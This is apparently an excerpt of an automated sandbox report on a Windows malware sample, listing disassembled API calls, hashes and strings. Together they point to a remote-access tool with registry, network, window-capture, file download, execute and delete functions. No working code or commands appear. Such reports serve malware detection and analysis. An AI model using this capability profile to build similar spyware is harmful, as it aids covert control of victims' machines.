                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                              • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                              • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                              • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044F461
                                              • _free.LIBCMT ref: 0044F49A
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F4A1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EnvironmentStrings$Free_free
                                              • String ID:
                                              • API String ID: 2716640707-0
                                              • Opcode ID: 0f2961337cf6473c9b59c8633065eebaee8da3dc7e8e50693e042ad6422b7f19
                                              • Instruction ID: 0fde98e0ac238faa149cd6f420f555edc5ad685e5938876998fddc3cfa248eb7
                                              • Opcode Fuzzy Hash: 0f2961337cf6473c9b59c8633065eebaee8da3dc7e8e50693e042ad6422b7f19
                                              • Instruction Fuzzy Hash: 41E0E537545A226BB211323A6C49D6F2A58CFD27B6726003BF40486242EE288D0641BA
                                              APIs
                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                              • RegCloseKey.KERNEL32(?), ref: 004135CD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                              • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                              • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                              • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                              APIs
                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C1D7,00466C58), ref: 00413551
                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C1D7,00466C58), ref: 00413565
                                              • RegCloseKey.KERNEL32(?,?,?,0040C1D7,00466C58), ref: 00413570
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                              • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                              • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                              • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                              APIs
                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                              • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                              • RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateValue
                                              • String ID:
                                              • API String ID: 1818849710-0
                                              • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                              • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                              • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                              • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: pQG
                                              • API String ID: 176396367-3769108836
                                              • Opcode ID: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                              • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                              • Opcode Fuzzy Hash: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                              • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                              APIs
                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID: @
                                              • API String ID: 1890195054-2766056989
                                              • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                              • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                              • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                              • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                              APIs
                                              • _free.LIBCMT ref: 00446227
                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                              • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap$_free
                                              • String ID:
                                              • API String ID: 1482568997-0
                                              • Opcode ID: 1f917527c9cd9112a4c2ab4db5d8ca91a49e76957baa276bc02c381a5932faf2
                                              • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                              • Opcode Fuzzy Hash: 1f917527c9cd9112a4c2ab4db5d8ca91a49e76957baa276bc02c381a5932faf2
                                              • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                              APIs
                                              • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEventStartupsocket
                                              • String ID:
                                              • API String ID: 1953588214-0
                                              • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                              • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                              • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                              • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                              • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                              • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                              • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 0041BB49
                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$ForegroundText
                                              • String ID:
                                              • API String ID: 29597999-0
                                              • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                              • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                              • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                              • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                              APIs
                                              • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                              • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                              • String ID:
                                              • API String ID: 1170566393-0
                                              • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                              • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                                              • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                              • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                              • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                              • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                              • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                              APIs
                                              • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Startup
                                              • String ID:
                                              • API String ID: 724789610-0
                                              • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                              • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                              • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                              • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: recv
                                              • String ID:
                                              • API String ID: 1507349165-0
                                              • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                              • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                              • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                              • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: send
                                              • String ID:
                                              • API String ID: 2809346765-0
                                              • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                              • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                              • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                              • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                              APIs
                                              • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                              • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C37D
                                                • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C3AD
                                                • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C402
                                                • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C463
                                                • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C46A
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                              • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                              • Sleep.KERNEL32(000007D0), ref: 00408733
                                              • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                              • String ID: (PG$(aF$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                              • API String ID: 1067849700-414524693
                                              • Opcode ID: 085f496563eb3368f1495d8a85dc81db8c626588090c1be3a7cd01995f697149
                                              • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                              • Opcode Fuzzy Hash: 085f496563eb3368f1495d8a85dc81db8c626588090c1be3a7cd01995f697149
